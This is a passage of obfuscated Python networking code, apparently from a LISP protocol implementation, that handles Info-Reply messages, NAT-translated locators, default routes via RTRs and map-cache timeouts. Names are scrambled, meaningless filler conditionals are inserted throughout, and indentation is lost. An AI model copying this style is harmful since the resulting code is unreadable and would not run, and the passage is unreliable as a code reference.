iIiiI1II11 . global_etr_rloc . store_address ( addr_str )
iIiiI1II11 . etr_port = sport
if 34 - 34: iII111i . i11iIiiIii + OoO0O00 + o0oOOo0O0Ooo / ooOoO0o - i11iIiiIii
if 63 - 63: ooOoO0o % OoO0O00 % ooOoO0o
if 28 - 28: IiII * I1Ii111 * o0oOOo0O0Ooo + ooOoO0o - IiII / IiII
if 73 - 73: iIii1I11I1II1 . I1ii11iIi11i + OOooOOo
if 51 - 51: I11i % Oo0Ooo * OOooOOo % OoooooooOO - OoOoOO00 % Ii1I
if ( iIiiI1II11 . hostname != None ) :
iIiiI1II11 . private_etr_rloc . afi = LISP_AFI_NAME
iIiiI1II11 . private_etr_rloc . store_address ( iIiiI1II11 . hostname )
if 60 - 60: OoOoOO00 - IiII + OoO0O00
if 77 - 77: iIii1I11I1II1
if ( rtr_list != None ) : iIiiI1II11 . rtr_list = rtr_list
packet = iIiiI1II11 . encode ( )
iIiiI1II11 . print_info ( )
if 92 - 92: IiII
if 68 - 68: OOooOOo . IiII / iIii1I11I1II1 % i11iIiiIii
if 74 - 74: iII111i + i11iIiiIii
if 95 - 95: Ii1I
if 49 - 49: I1ii11iIi11i . i1IIi + OoO0O00 % O0 + OoO0O00
lprint ( "Send Info-Reply to {}" . format ( red ( addr_str , False ) ) )
IIi11ii = lisp_convert_4to6 ( addr_str )
lisp_send ( lisp_sockets , IIi11ii , sport , packet )
if 21 - 21: ooOoO0o * oO0o / OoooooooOO % ooOoO0o / O0
if 24 - 24: OoO0O00 - i11iIiiIii / i11iIiiIii * I1Ii111
if 20 - 20: IiII % iIii1I11I1II1 . iII111i + iIii1I11I1II1 + O0
if 96 - 96: I1ii11iIi11i - IiII % OoooooooOO . iII111i
if 30 - 30: Oo0Ooo . OoooooooOO / Oo0Ooo / oO0o
IIiIIiiI11 = lisp_info_source ( iIiiI1II11 . hostname , addr_str , sport )
IIiIIiiI11 . cache_address_for_info_source ( )
return
if 92 - 92: I1IiiI + oO0o % iII111i
if 47 - 47: ooOoO0o . OOooOOo . oO0o + oO0o + i1IIi + iIii1I11I1II1
if 93 - 93: I1IiiI - i11iIiiIii * I1Ii111 - O0 + iII111i
if 11 - 11: iII111i
if 100 - 100: OoooooooOO / ooOoO0o . OoO0O00
if 89 - 89: I11i % II111iiii
if 35 - 35: oO0o
if 65 - 65: II111iiii
def lisp_get_signature_eid ( ) :
for OoO0oO in lisp_db_list :
if ( OoO0oO . signature_eid ) : return ( OoO0oO )
if 87 - 87: oO0o / OoO0O00 - oO0o
return ( None )
if 69 - 69: i11iIiiIii
if 29 - 29: IiII . ooOoO0o / iII111i - OOooOOo / OOooOOo % Oo0Ooo
if 42 - 42: OoO0O00 . I1Ii111 . I1IiiI + Oo0Ooo * O0
if 35 - 35: Oo0Ooo / iII111i - O0 - OOooOOo * Oo0Ooo . i11iIiiIii
if 43 - 43: OoOoOO00 % oO0o % OoO0O00 / Ii1I . I11i
if 86 - 86: I1Ii111 * i1IIi + IiII - OoOoOO00
if 14 - 14: I1ii11iIi11i / i11iIiiIii * I11i % o0oOOo0O0Ooo + IiII / I1ii11iIi11i
if 82 - 82: OOooOOo . oO0o
def lisp_get_any_translated_port ( ) :
for OoO0oO in lisp_db_list :
for OOOoOoo in OoO0oO . rloc_set :
if ( OOOoOoo . translated_rloc . is_null ( ) ) : continue
return ( OOOoOoo . translated_port )
if 12 - 12: i11iIiiIii + II111iiii
if 49 - 49: OoooooooOO
return ( None )
if 48 - 48: i1IIi . IiII - O0 + OoooooooOO
if 6 - 6: I1Ii111 * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i * I1Ii111
if 6 - 6: oO0o / II111iiii
if 23 - 23: IiII - OoooooooOO / oO0o
if 69 - 69: O0 - OoooooooOO
if 31 - 31: o0oOOo0O0Ooo . i1IIi - i1IIi % i1IIi - iIii1I11I1II1
if 50 - 50: IiII - OOooOOo % OoOoOO00
if 66 - 66: IiII * i11iIiiIii
if 64 - 64: i11iIiiIii . I1Ii111 % i11iIiiIii % I11i
def lisp_get_any_translated_rloc ( ) :
for OoO0oO in lisp_db_list :
for OOOoOoo in OoO0oO . rloc_set :
if ( OOOoOoo . translated_rloc . is_null ( ) ) : continue
return ( OOOoOoo . translated_rloc )
if 56 - 56: o0oOOo0O0Ooo + ooOoO0o + OoooooooOO
if 64 - 64: OOooOOo / OoOoOO00
return ( None )
if 30 - 30: OOooOOo % I1Ii111 - i11iIiiIii
if 20 - 20: i1IIi * I11i / OoO0O00 / i1IIi / I1Ii111 * O0
if 95 - 95: Ii1I + Ii1I % IiII - IiII / OOooOOo
if 46 - 46: IiII + iII111i + II111iiii . iII111i - i11iIiiIii % OoO0O00
if 24 - 24: oO0o + IiII . o0oOOo0O0Ooo . OoooooooOO . i11iIiiIii / I1ii11iIi11i
if 49 - 49: IiII
if 1 - 1: oO0o / I11i
def lisp_get_all_translated_rlocs ( ) :
OOO0O0Oo0O0 = [ ]
for OoO0oO in lisp_db_list :
for OOOoOoo in OoO0oO . rloc_set :
if ( OOOoOoo . is_rloc_translated ( ) == False ) : continue
IiI = OOOoOoo . translated_rloc . print_address_no_iid ( )
OOO0O0Oo0O0 . append ( IiI )
if 53 - 53: iII111i
if 7 - 7: OoooooooOO . Ii1I - OoooooooOO / i1IIi / i1IIi / iIii1I11I1II1
return ( OOO0O0Oo0O0 )
if 78 - 78: i11iIiiIii / O0 . OoooooooOO % i11iIiiIii / iIii1I11I1II1 . OoooooooOO
if 1 - 1: oO0o - i11iIiiIii . OoOoOO00
if 16 - 16: OOooOOo
if 33 - 33: o0oOOo0O0Ooo / OoO0O00 + OoooooooOO
if 82 - 82: o0oOOo0O0Ooo / i1IIi / i11iIiiIii * Oo0Ooo / OoO0O00
if 95 - 95: I11i . OoOoOO00 * Ii1I
if 94 - 94: OoOoOO00 / OoO0O00 / ooOoO0o + II111iiii
if 55 - 55: II111iiii - IiII
def lisp_update_default_routes ( map_resolver , iid , rtr_list ) :
OoooO0oo0o0 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 24 - 24: oO0o % Ii1I / i1IIi
oOOOI11I = { }
for iIIiI11 in rtr_list :
if ( iIIiI11 == None ) : continue
IiI = rtr_list [ iIIiI11 ]
if ( OoooO0oo0o0 and IiI . is_private_address ( ) ) : continue
oOOOI11I [ iIIiI11 ] = IiI
if 52 - 52: Ii1I * II111iiii - OOooOOo % o0oOOo0O0Ooo
rtr_list = oOOOI11I
if 78 - 78: OOooOOo + OoooooooOO - I1IiiI - Ii1I . II111iiii . O0
IIi1I1i11i11 = [ ]
for i1I1iiiI in [ LISP_AFI_IPV4 , LISP_AFI_IPV6 , LISP_AFI_MAC ] :
if ( i1I1iiiI == LISP_AFI_MAC and lisp_l2_overlay == False ) : break
if 52 - 52: oO0o
if 73 - 73: IiII - II111iiii - OOooOOo % II111iiii + iIii1I11I1II1
if 81 - 81: i11iIiiIii - O0 + I1IiiI
if 39 - 39: IiII * OOooOOo . OoooooooOO + Oo0Ooo + iIii1I11I1II1
if 67 - 67: iII111i . OOooOOo / ooOoO0o * iIii1I11I1II1
Oo0OoOI1I11iII1I1i = lisp_address ( i1I1iiiI , "" , 0 , iid )
Oo0OoOI1I11iII1I1i . make_default_route ( Oo0OoOI1I11iII1I1i )
I11iiI1III = lisp_map_cache . lookup_cache ( Oo0OoOI1I11iII1I1i , True )
if ( I11iiI1III ) :
if ( I11iiI1III . checkpoint_entry ) :
lprint ( "Updating checkpoint entry for {}" . format ( green ( I11iiI1III . print_eid_tuple ( ) , False ) ) )
if 29 - 29: I1Ii111 / OoOoOO00 % I1ii11iIi11i * IiII / II111iiii
elif ( I11iiI1III . do_rloc_sets_match ( list ( rtr_list . values ( ) ) ) ) :
continue
if 10 - 10: O0 / I11i
I11iiI1III . delete_cache ( )
if 29 - 29: i11iIiiIii % I11i
if 49 - 49: I11i
IIi1I1i11i11 . append ( [ Oo0OoOI1I11iII1I1i , "" ] )
if 69 - 69: o0oOOo0O0Ooo . O0 * I11i
if 92 - 92: OoO0O00 . O0 / Ii1I % Oo0Ooo . Ii1I
if 40 - 40: o0oOOo0O0Ooo - Ii1I . iII111i - O0
if 53 - 53: Oo0Ooo - I1IiiI * O0 . II111iiii
oo0oOooo0O = lisp_address ( i1I1iiiI , "" , 0 , iid )
oo0oOooo0O . make_default_multicast_route ( oo0oOooo0O )
O0o0o0o0O = lisp_map_cache . lookup_cache ( oo0oOooo0O , True )
if ( O0o0o0o0O ) : O0o0o0o0O = O0o0o0o0O . source_cache . lookup_cache ( Oo0OoOI1I11iII1I1i , True )
if ( O0o0o0o0O ) : O0o0o0o0O . delete_cache ( )
if 16 - 16: iIii1I11I1II1 / OoO0O00 . IiII + IiII / I1ii11iIi11i
IIi1I1i11i11 . append ( [ Oo0OoOI1I11iII1I1i , oo0oOooo0O ] )
if 49 - 49: I11i + OOooOOo - I1ii11iIi11i
if ( len ( IIi1I1i11i11 ) == 0 ) : return
if 23 - 23: OOooOOo % I1ii11iIi11i + iIii1I11I1II1 + iII111i
if 9 - 9: OOooOOo * o0oOOo0O0Ooo / I11i . i11iIiiIii
if 44 - 44: iII111i - II111iiii
if 45 - 45: OoO0O00 % iII111i / iIii1I11I1II1 % I1IiiI + OOooOOo
OO00O000OOO = [ ]
for iiO0ooooOooo in rtr_list :
o0Ii1i1ii11 = rtr_list [ iiO0ooooOooo ]
OOOoOoo = lisp_rloc ( )
OOOoOoo . rloc . copy_address ( o0Ii1i1ii11 )
OOOoOoo . priority = 254
OOOoOoo . mpriority = 255
OOOoOoo . rloc_name = "RTR"
OO00O000OOO . append ( OOOoOoo )
if 33 - 33: iII111i / i1IIi . II111iiii % I1ii11iIi11i
if 74 - 74: iII111i / OOooOOo / O0 / iIii1I11I1II1 + IiII
for Oo0OoOI1I11iII1I1i in IIi1I1i11i11 :
I11iiI1III = lisp_mapping ( Oo0OoOI1I11iII1I1i [ 0 ] , Oo0OoOI1I11iII1I1i [ 1 ] , OO00O000OOO )
I11iiI1III . mapping_source = map_resolver
I11iiI1III . map_cache_ttl = LISP_MR_TTL * 60
I11iiI1III . add_cache ( )
lprint ( "Add {} to map-cache with RTR RLOC-set: {}" . format ( green ( I11iiI1III . print_eid_tuple ( ) , False ) , list ( rtr_list . keys ( ) ) ) )
if 26 - 26: OOooOOo % i1IIi . I1Ii111 / O0 + I1Ii111
OO00O000OOO = copy . deepcopy ( OO00O000OOO )
if 39 - 39: I1ii11iIi11i * I1IiiI * II111iiii . Oo0Ooo % I1IiiI
return
if 100 - 100: iIii1I11I1II1 - OoooooooOO * OoooooooOO - iII111i / ooOoO0o
if 98 - 98: OoO0O00 + oO0o - II111iiii
if 84 - 84: Oo0Ooo . OoOoOO00 - iII111i
if 5 - 5: OoooooooOO . O0 / OOooOOo + I11i - Ii1I
if 77 - 77: iIii1I11I1II1 * Oo0Ooo . IiII / oO0o + O0
if 76 - 76: iII111i + o0oOOo0O0Ooo - OoooooooOO * oO0o % OoooooooOO - O0
if 18 - 18: Ii1I
if 82 - 82: OoOoOO00 + OoO0O00 - IiII / ooOoO0o
if 70 - 70: OoO0O00
if 43 - 43: ooOoO0o + OOooOOo + II111iiii - I1IiiI
def lisp_process_info_reply ( source , packet , store ) :
if 58 - 58: I11i
if 94 - 94: Oo0Ooo
if 39 - 39: I11i - oO0o % iII111i - ooOoO0o - OoOoOO00
if 8 - 8: i1IIi % i1IIi % OoooooooOO % i1IIi . iIii1I11I1II1
iIiiI1II11 = lisp_info ( )
packet = iIiiI1II11 . decode ( packet )
if ( packet == None ) : return ( [ None , None , False ] )
if 70 - 70: O0 + II111iiii % IiII / I1Ii111 - IiII
iIiiI1II11 . print_info ( )
if 58 - 58: II111iiii * oO0o - i1IIi . I11i
if 23 - 23: OoO0O00 - I1IiiI * i11iIiiIii
if 62 - 62: OoO0O00 . i11iIiiIii / i1IIi
if 3 - 3: OoO0O00 + O0 % Oo0Ooo * Oo0Ooo % i11iIiiIii
I1i1 = False
for iiO0ooooOooo in iIiiI1II11 . rtr_list :
O0O0 = iiO0ooooOooo . print_address_no_iid ( )
if ( O0O0 in lisp_rtr_list ) :
if ( lisp_register_all_rtrs == False ) : continue
if ( lisp_rtr_list [ O0O0 ] != None ) : continue
if 51 - 51: I1IiiI . ooOoO0o / Ii1I / I1Ii111
I1i1 = True
lisp_rtr_list [ O0O0 ] = iiO0ooooOooo
if 84 - 84: I11i - Ii1I
if 36 - 36: i1IIi
if 21 - 21: iII111i . OoOoOO00 % o0oOOo0O0Ooo - i11iIiiIii
if 86 - 86: I1Ii111 % i11iIiiIii
if 22 - 22: I1Ii111
if ( lisp_i_am_itr and I1i1 ) :
if ( lisp_iid_to_interface == { } ) :
lisp_update_default_routes ( source , lisp_default_iid , lisp_rtr_list )
else :
for oooo in list ( lisp_iid_to_interface . keys ( ) ) :
lisp_update_default_routes ( source , int ( oooo ) , lisp_rtr_list )
if 64 - 64: OoOoOO00 + II111iiii + o0oOOo0O0Ooo % iIii1I11I1II1 - OOooOOo
if 60 - 60: ooOoO0o % iIii1I11I1II1 / iIii1I11I1II1
if 61 - 61: oO0o
if 12 - 12: iIii1I11I1II1 - I1ii11iIi11i % I1ii11iIi11i * I1Ii111
if 98 - 98: oO0o / iII111i - Oo0Ooo / I1Ii111 * oO0o - OoO0O00
if 12 - 12: IiII . OoooooooOO - iIii1I11I1II1 % iII111i
if 56 - 56: Oo0Ooo / I1IiiI + iIii1I11I1II1 + I1IiiI % iIii1I11I1II1
if ( store == False ) :
return ( [ iIiiI1II11 . global_etr_rloc , iIiiI1II11 . etr_port , I1i1 ] )
if 64 - 64: O0
if 55 - 55: OoO0O00 * oO0o . Ii1I + OoOoOO00 % I11i + IiII
if 55 - 55: OoooooooOO + oO0o . o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
if 40 - 40: I1IiiI . o0oOOo0O0Ooo - Oo0Ooo
if 44 - 44: Ii1I % OoO0O00 * oO0o * OoO0O00
if 7 - 7: I1Ii111 % i1IIi . I11i . O0 / i1IIi
for OoO0oO in lisp_db_list :
for OOOoOoo in OoO0oO . rloc_set :
iIIiI11 = OOOoOoo . rloc
i111IIiIiiI1 = OOOoOoo . interface
if ( i111IIiIiiI1 == None ) :
if ( iIIiI11 . is_null ( ) ) : continue
if ( iIIiI11 . is_local ( ) == False ) : continue
if ( iIiiI1II11 . private_etr_rloc . is_null ( ) == False and
iIIiI11 . is_exact_match ( iIiiI1II11 . private_etr_rloc ) == False ) :
continue
if 56 - 56: Oo0Ooo
elif ( iIiiI1II11 . private_etr_rloc . is_dist_name ( ) ) :
oOo = iIiiI1II11 . private_etr_rloc . address
if ( oOo != OOOoOoo . rloc_name ) : continue
if 21 - 21: i11iIiiIii * o0oOOo0O0Ooo + Oo0Ooo
if 20 - 20: IiII / OoooooooOO / O0 / I1Ii111 * ooOoO0o
i1iiii = green ( OoO0oO . eid . print_prefix ( ) , False )
IIIOo0O = red ( iIIiI11 . print_address_no_iid ( ) , False )
if 45 - 45: ooOoO0o / Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o
iIi1I11IIi = iIiiI1II11 . global_etr_rloc . is_exact_match ( iIIiI11 )
if ( OOOoOoo . translated_port == 0 and iIi1I11IIi ) :
lprint ( "No NAT for {} ({}), EID-prefix {}" . format ( IIIOo0O ,
i111IIiIiiI1 , i1iiii ) )
continue
if 73 - 73: Ii1I - II111iiii + I1IiiI % i11iIiiIii * I11i
if 69 - 69: I1Ii111 . Ii1I * I1ii11iIi11i % I11i - o0oOOo0O0Ooo
if 30 - 30: ooOoO0o / Oo0Ooo * iII111i % OoooooooOO / I1ii11iIi11i
if 64 - 64: OoooooooOO
if 41 - 41: Ii1I . I11i / oO0o * OoooooooOO
oOOoo0oO = iIiiI1II11 . global_etr_rloc
iI1i1i11Ii1 = OOOoOoo . translated_rloc
if ( iI1i1i11Ii1 . is_exact_match ( oOOoo0oO ) and
iIiiI1II11 . etr_port == OOOoOoo . translated_port ) : continue
if 80 - 80: IiII
lprint ( "Store translation {}:{} for {} ({}), EID-prefix {}" . format ( red ( iIiiI1II11 . global_etr_rloc . print_address_no_iid ( ) , False ) ,
# I1ii11iIi11i - iII111i * i1IIi * iII111i
iIiiI1II11 . etr_port , IIIOo0O , i111IIiIiiI1 , i1iiii ) )
if 61 - 61: Oo0Ooo - o0oOOo0O0Ooo
OOOoOoo . store_translated_rloc ( iIiiI1II11 . global_etr_rloc ,
iIiiI1II11 . etr_port )
if 36 - 36: OOooOOo
if 16 - 16: I1ii11iIi11i % Ii1I . iII111i * I1IiiI * Ii1I
return ( [ iIiiI1II11 . global_etr_rloc , iIiiI1II11 . etr_port , I1i1 ] )
if 82 - 82: OoO0O00 % OoOoOO00 * i11iIiiIii . OoO0O00 . I1ii11iIi11i + Ii1I
if 60 - 60: i1IIi / iII111i
if 10 - 10: I1Ii111 / OoOoOO00 * Ii1I % o0oOOo0O0Ooo . OoOoOO00 / I1ii11iIi11i
if 2 - 2: iIii1I11I1II1
if 85 - 85: O0 - ooOoO0o
if 35 - 35: o0oOOo0O0Ooo - I1IiiI
if 47 - 47: i11iIiiIii * iII111i . OoOoOO00 * I1Ii111 % i11iIiiIii + Ii1I
if 65 - 65: Ii1I % i11iIiiIii
def lisp_test_mr ( lisp_sockets , port ) :
return
lprint ( "Test Map-Resolvers" )
if 98 - 98: iII111i * o0oOOo0O0Ooo % Oo0Ooo
o0Ooo0Oooo0o = lisp_address ( LISP_AFI_IPV4 , "" , 0 , 0 )
II1iiII1ii111 = lisp_address ( LISP_AFI_IPV6 , "" , 0 , 0 )
if 82 - 82: o0oOOo0O0Ooo / iIii1I11I1II1
if 81 - 81: iII111i / i11iIiiIii * I1Ii111 % OoooooooOO . I1IiiI
if 3 - 3: OoOoOO00 . I11i * i11iIiiIii - ooOoO0o
if 47 - 47: ooOoO0o . I1IiiI / i11iIiiIii * iII111i * I1IiiI
o0Ooo0Oooo0o . store_address ( "10.0.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , o0Ooo0Oooo0o , None )
o0Ooo0Oooo0o . store_address ( "192.168.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , o0Ooo0Oooo0o , None )
if 8 - 8: oO0o % oO0o . iII111i / i1IIi % IiII
if 71 - 71: OoOoOO00 + oO0o % O0 + Oo0Ooo
if 62 - 62: i1IIi . Ii1I * i1IIi * O0 . I1IiiI % o0oOOo0O0Ooo
if 16 - 16: I11i . Ii1I - ooOoO0o . OOooOOo % O0 / oO0o
II1iiII1ii111 . store_address ( "0100::1" )
lisp_send_map_request ( lisp_sockets , port , None , II1iiII1ii111 , None )
II1iiII1ii111 . store_address ( "8000::1" )
lisp_send_map_request ( lisp_sockets , port , None , II1iiII1ii111 , None )
if 42 - 42: II111iiii . iII111i
if 67 - 67: i1IIi - i11iIiiIii / ooOoO0o * oO0o
if 64 - 64: oO0o / IiII
if 86 - 86: I11i
iIIi1OO00ooo = threading . Timer ( LISP_TEST_MR_INTERVAL , lisp_test_mr ,
[ lisp_sockets , port ] )
iIIi1OO00ooo . start ( )
return
if 87 - 87: ooOoO0o / Ii1I % O0 . OoO0O00
if 55 - 55: i1IIi . o0oOOo0O0Ooo % OoooooooOO + II111iiii . OoOoOO00
if 32 - 32: IiII * I1Ii111 * Oo0Ooo . i1IIi * OoooooooOO
if 12 - 12: I1IiiI . OOooOOo % Oo0Ooo
if 86 - 86: i11iIiiIii
if 57 - 57: iII111i - OoooooooOO - ooOoO0o % II111iiii
if 62 - 62: i11iIiiIii . Oo0Ooo / Oo0Ooo . IiII . OoooooooOO
if 86 - 86: I1ii11iIi11i * OoOoOO00 + iII111i
if 79 - 79: I11i - II111iiii
if 27 - 27: I1IiiI + o0oOOo0O0Ooo * oO0o % I1IiiI
if 66 - 66: OoO0O00 + IiII . o0oOOo0O0Ooo . IiII
if 88 - 88: oO0o + oO0o % OoO0O00 . OoooooooOO - OoooooooOO . Oo0Ooo
if 44 - 44: I1IiiI * IiII . OoooooooOO
def lisp_update_local_rloc ( rloc ) :
if ( rloc . interface == None ) : return
if 62 - 62: I11i - Ii1I / i11iIiiIii * I1IiiI + ooOoO0o + o0oOOo0O0Ooo
IiI = lisp_get_interface_address ( rloc . interface )
if ( IiI == None ) : return
if 10 - 10: i1IIi + o0oOOo0O0Ooo
I111i1IIiii11 = rloc . rloc . print_address_no_iid ( )
I11Ii1I1I1111 = IiI . print_address_no_iid ( )
if 79 - 79: i11iIiiIii % I1IiiI . OoooooooOO * oO0o . Ii1I
if ( I111i1IIiii11 == I11Ii1I1I1111 ) : return
if 14 - 14: iIii1I11I1II1 / I11i - o0oOOo0O0Ooo / IiII / o0oOOo0O0Ooo . OoO0O00
lprint ( "Local interface address changed on {} from {} to {}" . format ( rloc . interface , I111i1IIiii11 , I11Ii1I1I1111 ) )
if 2 - 2: I11i
if 12 - 12: i1IIi . I1Ii111
rloc . rloc . copy_address ( IiI )
lisp_myrlocs [ 0 ] = IiI
return
if 99 - 99: Oo0Ooo / i11iIiiIii
if 81 - 81: Ii1I . i1IIi % iII111i . OoO0O00 % IiII
if 42 - 42: iII111i / Oo0Ooo
if 14 - 14: O0 . Oo0Ooo
if 8 - 8: i11iIiiIii
if 80 - 80: I1ii11iIi11i + Ii1I
if 16 - 16: i11iIiiIii * Oo0Ooo
if 76 - 76: iII111i . oO0o - i1IIi
def lisp_update_encap_port ( mc ) :
for iIIiI11 in mc . rloc_set :
iII1ii1 = lisp_get_nat_info ( iIIiI11 . rloc , iIIiI11 . rloc_name )
if ( iII1ii1 == None ) : continue
if ( iIIiI11 . translated_port == iII1ii1 . port ) : continue
if 94 - 94: O0 % iII111i
lprint ( ( "Encap-port changed from {} to {} for RLOC {}, " + "EID-prefix {}" ) . format ( iIIiI11 . translated_port , iII1ii1 . port ,
# IiII . ooOoO0o . I1ii11iIi11i % OoOoOO00 . I1ii11iIi11i . OOooOOo
red ( iIIiI11 . rloc . print_address_no_iid ( ) , False ) ,
green ( mc . print_eid_tuple ( ) , False ) ) )
if 19 - 19: Ii1I - I1IiiI + OoOoOO00
iIIiI11 . store_translated_rloc ( iIIiI11 . rloc , iII1ii1 . port )
if 33 - 33: Oo0Ooo + O0 . I11i + I11i
return
if 100 - 100: iII111i . Oo0Ooo
if 29 - 29: IiII * I1IiiI * oO0o * I1Ii111 / iIii1I11I1II1 . o0oOOo0O0Ooo
if 95 - 95: O0 . OOooOOo / II111iiii + II111iiii
if 45 - 45: II111iiii . iII111i
if 11 - 11: oO0o / OoooooooOO - OoO0O00 . iIii1I11I1II1 % I1IiiI
if 98 - 98: I1IiiI + Ii1I
if 7 - 7: o0oOOo0O0Ooo . OoooooooOO
if 32 - 32: I1ii11iIi11i
if 46 - 46: Ii1I . i11iIiiIii / I1Ii111 - I1ii11iIi11i
if 13 - 13: IiII % I1Ii111
if 9 - 9: OoooooooOO * ooOoO0o % I1ii11iIi11i . I1IiiI % O0
if 91 - 91: OOooOOo * OoooooooOO * I1IiiI . i1IIi
def lisp_timeout_map_cache_entry ( mc , delete_list ) :
if ( mc . map_cache_ttl == None ) :
lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 9 - 9: oO0o / i11iIiiIii + IiII / IiII - I11i
if 87 - 87: iII111i
O000oo = lisp_get_timestamp ( )
if 37 - 37: oO0o + OoO0O00
if 66 - 66: iIii1I11I1II1 * iIii1I11I1II1 + IiII % I1IiiI
if 60 - 60: I1Ii111 . IiII / Oo0Ooo
if 32 - 32: OoOoOO00 + Ii1I * iII111i % Oo0Ooo
if 61 - 61: OoooooooOO % iII111i - O0
if 62 - 62: iIii1I11I1II1
if ( mc . last_refresh_time + mc . map_cache_ttl > O000oo ) :
if ( mc . action == LISP_NO_ACTION ) : lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 14 - 14: I1Ii111
if 95 - 95: II111iiii / o0oOOo0O0Ooo * OOooOOo
if 81 - 81: i11iIiiIii / iIii1I11I1II1
if 73 - 73: i11iIiiIii . I1ii11iIi11i * OoOoOO00
if 95 - 95: i1IIi + iIii1I11I1II1 . I1Ii111 / I1Ii111
if ( lisp_nat_traversal and mc . eid . address == 0 and mc . eid . mask_len == 0 ) :
return ( [ True , delete_list ] )
if 84 - 84: Oo0Ooo . OoO0O00 * IiII
if 95 - 95: OoO0O00
if 100 - 100: II111iiii
if 34 - 34: I11i % OOooOOo - iII111i % II111iiii
if 14 - 14: I11i * o0oOOo0O0Ooo % II111iiii
i1i111Iiiiiii = lisp_print_elapsed ( mc . last_refresh_time )
o0oo0OO0oO = mc . print_eid_tuple ( )
lprint ( "Map-cache entry for EID-prefix {} has {}, had uptime of {}" . format ( green ( o0oo0OO0oO , False ) , bold ( "timed out" , False ) , i1i111Iiiiiii ) )
if 36 - 36: ooOoO0o - iIii1I11I1II1 / IiII + OoOoOO00
if 42 - 42: ooOoO0o + I1IiiI * iII111i / OoOoOO00 . i1IIi - OoooooooOO
if 8 - 8: iIii1I11I1II1 - Oo0Ooo + iII111i
if 40 - 40: o0oOOo0O0Ooo * I1IiiI
if 75 - 75: O0 * OOooOOo / ooOoO0o + I11i
delete_list . append ( mc )
return ( [ True , delete_list ] )
if 56 - 56: I1IiiI % OoooooooOO % Oo0Ooo
if 19 - 19: i11iIiiIii - iIii1I11I1II1 . i1IIi . I1Ii111 / I1IiiI * I1Ii111
if 41 - 41: oO0o . o0oOOo0O0Ooo . I11i * OoOoOO00
if 16 - 16: oO0o
if 32 - 32: OoooooooOO
if 77 - 77: Oo0Ooo . i1IIi - I11i
if 98 - 98: O0
if 87 - 87: OoO0O00 % I1Ii111 - OOooOOo - II111iiii + iII111i
def lisp_timeout_map_cache_walk ( mc , parms ) :
iIi1II1IiI1I = parms [ 0 ]
oo0ooOoOO0 = parms [ 1 ]
if 22 - 22: Oo0Ooo - I1ii11iIi11i + I11i . oO0o
if 85 - 85: iIii1I11I1II1 / Ii1I
if 43 - 43: I1IiiI % I1Ii111 - oO0o . II111iiii / iIii1I11I1II1
if 97 - 97: I1Ii111 + I1ii11iIi11i
if ( mc . group . is_null ( ) ) :
o0o0O0O0Oooo0 , iIi1II1IiI1I = lisp_timeout_map_cache_entry ( mc , iIi1II1IiI1I )
if ( iIi1II1IiI1I == [ ] or mc != iIi1II1IiI1I [ - 1 ] ) :
oo0ooOoOO0 = lisp_write_checkpoint_entry ( oo0ooOoOO0 , mc )
if 21 - 21: O0 + o0oOOo0O0Ooo * OoooooooOO % IiII % I1ii11iIi11i
return ( [ o0o0O0O0Oooo0 , parms ] )
if 80 - 80: I11i
if 28 - 28: OoOoOO00 * OoooooooOO * i11iIiiIii
if ( mc . source_cache == None ) : return ( [ True , parms ] )
if 88 - 88: ooOoO0o + ooOoO0o / I1Ii111
if 69 - 69: O0 * o0oOOo0O0Ooo + i1IIi * ooOoO0o . o0oOOo0O0Ooo
if 46 - 46: Oo0Ooo / Oo0Ooo * IiII
if 65 - 65: iIii1I11I1II1 * o0oOOo0O0Ooo - iII111i % II111iiii - I1ii11iIi11i
if 65 - 65: I11i
parms = mc . source_cache . walk_cache ( lisp_timeout_map_cache_entry , parms )
return ( [ True , parms ] )
if 92 - 92: iII111i . IiII + i1IIi % i1IIi
if 11 - 11: I1ii11iIi11i + iIii1I11I1II1 - I1Ii111 * iIii1I11I1II1 * IiII + oO0o
if 6 - 6: I1Ii111 * OOooOOo + i1IIi - Ii1I / oO0o
if 81 - 81: I1Ii111 % oO0o * i1IIi * OoooooooOO / Oo0Ooo
if 70 - 70: I1IiiI
if 35 - 35: i11iIiiIii
if 59 - 59: ooOoO0o . iII111i - II111iiii
def lisp_timeout_map_cache ( lisp_map_cache ) :
I1iII1IIi1IiI = [ [ ] , [ ] ]
I1iII1IIi1IiI = lisp_map_cache . walk_cache ( lisp_timeout_map_cache_walk , I1iII1IIi1IiI )
if 30 - 30: o0oOOo0O0Ooo % iII111i - i11iIiiIii
if 25 - 25: i11iIiiIii + OoOoOO00 + oO0o / Ii1I * Oo0Ooo + Oo0Ooo
if 26 - 26: I1IiiI % I1ii11iIi11i + o0oOOo0O0Ooo / I1ii11iIi11i - I1IiiI
if 55 - 55: OoooooooOO
if 2 - 2: Oo0Ooo + I11i / OOooOOo + OOooOOo
iIi1II1IiI1I = I1iII1IIi1IiI [ 0 ]
for I11iiI1III in iIi1II1IiI1I : I11iiI1III . delete_cache ( )
if 62 - 62: OOooOOo . iIii1I11I1II1 + I1IiiI / OOooOOo
if 90 - 90: OOooOOo
if 29 - 29: OoOoOO00 - I1IiiI / oO0o + Oo0Ooo + I1Ii111 + O0
if 65 - 65: oO0o
oo0ooOoOO0 = I1iII1IIi1IiI [ 1 ]
lisp_checkpoint ( oo0ooOoOO0 )
return
if 38 - 38: iIii1I11I1II1 / I1Ii111 + ooOoO0o . II111iiii - iIii1I11I1II1
if 13 - 13: Ii1I
if 34 - 34: I1IiiI / iIii1I11I1II1
if 35 - 35: oO0o / oO0o
if 86 - 86: o0oOOo0O0Ooo . Oo0Ooo - Ii1I / i11iIiiIii
if 63 - 63: oO0o - O0 + I1ii11iIi11i + Ii1I / i1IIi
if 77 - 77: O0
if 49 - 49: o0oOOo0O0Ooo / i11iIiiIii
if 36 - 36: II111iiii
if 78 - 78: OoO0O00 + iIii1I11I1II1 * i1IIi
if 7 - 7: i11iIiiIii
if 49 - 49: I1IiiI - oO0o % OOooOOo / O0 / II111iiii
if 41 - 41: IiII % II111iiii
if 99 - 99: IiII - O0
if 59 - 59: iII111i % O0 + OOooOOo * ooOoO0o
if 27 - 27: I1Ii111 % i11iIiiIii * I1IiiI
def lisp_store_nat_info ( hostname , rloc , port ) :
O0O0 = rloc . print_address_no_iid ( )
